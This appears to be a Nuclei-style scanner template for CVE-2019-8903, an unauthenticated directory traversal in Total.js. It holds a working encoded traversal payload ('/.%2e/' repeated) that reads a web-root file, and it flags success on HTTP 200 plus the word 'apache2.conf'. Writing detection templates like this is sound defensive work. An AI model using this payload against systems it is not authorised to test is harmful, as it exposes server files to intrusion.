id: CVE-2019-8903 info: name: Totaljs - Unathenticated Directory Traversal author: madrobot severity: high requests: - method: GET path: - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "apache2.conf" part: body